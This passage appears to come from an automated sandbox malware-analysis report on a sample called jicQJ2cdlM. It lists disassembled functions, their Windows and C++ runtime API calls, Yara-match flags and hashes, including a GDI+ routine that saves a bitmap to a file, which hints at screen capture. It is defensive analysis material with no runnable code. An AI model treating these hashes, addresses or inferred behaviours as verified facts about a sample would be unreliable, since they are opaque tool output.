                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00405559
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                    • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                                                    • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                                                    • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                                                    • int.LIBCPMT ref: 004055BB
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                                                    • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                    • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                                                    • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                    • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                                                    • int.LIBCPMT ref: 00404C61
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                                                    • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009EC426
                                                                                    • int.LIBCPMT ref: 009EC43D
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009EC446
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009EC477
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009EC48D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009EC4AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction ID: 158be597f2f2fe80c30eca89bfafc3f8f9c53f6149cc78030d80877539e3bc9a
                                                                                    • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction Fuzzy Hash: 8711CEB28002A8ABCB02FBA1C811BFD7764AF84311F144519F5517B2E2DF749E46CB90
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009E4EB1
                                                                                    • int.LIBCPMT ref: 009E4EC8
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009E4ED1
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009E4F02
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009E4F18
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009E4F36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction ID: e2fb0b261ec61d2336ac44e2986b912e1c380db4c5a8b8b7f5de1b182c6f1375
                                                                                    • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction Fuzzy Hash: 7D11A1728002A89BCF16EBA5C845BED7774BF84711F140519F514672D2DF749E44CB94
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00A0898A
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00A08A43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: 11@$@fB$csm
                                                                                    • API String ID: 3480331319-1464837749
                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction ID: 00d4dc4de233b62f49939e16a1274f5a1e79632fa66ecbd208dfdac215c61fdf
                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction Fuzzy Hash: 4641E630E0030DABCF10DF68D881AAEBBB5AF44364F148156E8556B3D2DB3ADE11CB95
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                                                      • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2630251706-1785270423
                                                                                    • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                    • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                                                    • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                    • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler
                                                                                    • API String ID: 3657713681-923244539
                                                                                    • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                                                    • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                                                    APIs
                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@$pContext
                                                                                    • API String ID: 1990795212-1086721755
                                                                                    • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                                                    • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                                                    APIs
                                                                                    • Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
                                                                                      • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
                                                                                      • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
                                                                                    • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
                                                                                      • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
                                                                                      • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
                                                                                      • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3659872527-1785270423
                                                                                    • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction ID: 5f19519383477fd90e693e8c592c5b4d2a982a5ecb934fba7b69a42e3a353b75
                                                                                    • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
                                                                                    APIs
                                                                                    • Concurrency::critical_section::unlock.LIBCMT ref: 009F2123
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 009F13BA
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 009F13F1
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 009F13FD
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 009F212F
                                                                                      • Part of subcall function 009F0D0A: Concurrency::critical_section::unlock.LIBCMT ref: 009F0D2E
                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 009F2134
                                                                                      • Part of subcall function 009F2EE8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 009F2EEA
                                                                                    • Concurrency::critical_section::lock.LIBCONCRT ref: 009F2154
                                                                                      • Part of subcall function 009F12C2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F12D0
                                                                                      • Part of subcall function 009F12C2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F12DD
                                                                                      • Part of subcall function 009F12C2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 009F12E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3659872527-1785270423
                                                                                    • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction ID: 062f20dbf43070862eb7f4e95739510506eaa6ed697b6e87d48212500baea15a
                                                                                    • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction Fuzzy Hash: 57E04F3560051E9BCB08FB64C8617BCFB61BFC5310B544249A565472E2CF746E46DBC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                    • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                                                    • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                    • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                    • Instruction ID: 3fcc0115710fcafdd79e88be8057a95b3eb59d611b01eab74e40388ce73881f9
                                                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                    • Instruction Fuzzy Hash: D471C23192021EDBCB218F95EE84ABFBB75EF55310F2442A9E412972D1DB70AD41CBB1
                                                                                    APIs
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    • _free.LIBCMT ref: 00430B6F
                                                                                    • _free.LIBCMT ref: 00430B86
                                                                                    • _free.LIBCMT ref: 00430BA5
                                                                                    • _free.LIBCMT ref: 00430BC0
                                                                                    • _free.LIBCMT ref: 00430BD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3033488037-0
                                                                                    • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                    • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                                                    • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                    • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3033488037-0
                                                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                    • Instruction ID: 2f5d718656467f31ba35d4f49ef85b867146be96070b5ab60165ce99805ba8a8
                                                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                    • Instruction Fuzzy Hash: DE51C671A00704AFDB20DF69D941BAAB7F4EF59710B144569E909DB290E771ED81CB40
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                                                    • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction ID: aef147785f1886856430ba9e22658de10bd386e6b6aea666fd86e2b5b2845d2b
                                                                                    • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction Fuzzy Hash: 1A41AF36A003049FCB24DF78C981AAEB7F5EF89714F2585A9E615EB381D731AD41CB80
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                                                    • __alloca_probe_16.LIBCMT ref: 00436942
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                                                    • __freea.LIBCMT ref: 004369AE
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                    • String ID:
                                                                                    • API String ID: 313313983-0
                                                                                    • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                    • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                                                    • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                    • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                                                    APIs
                                                                                    • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                                                      • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                                                    • List.LIBCMT ref: 0041AFD4
                                                                                    • List.LIBCMT ref: 0041AFE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                    • String ID:
                                                                                    • API String ID: 3281396844-0
                                                                                    • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                    • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                                                    • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                    • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                                                    APIs
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                    • String ID:
                                                                                    • API String ID: 2357751836-0
                                                                                    • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                    • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                                                    • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                    • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
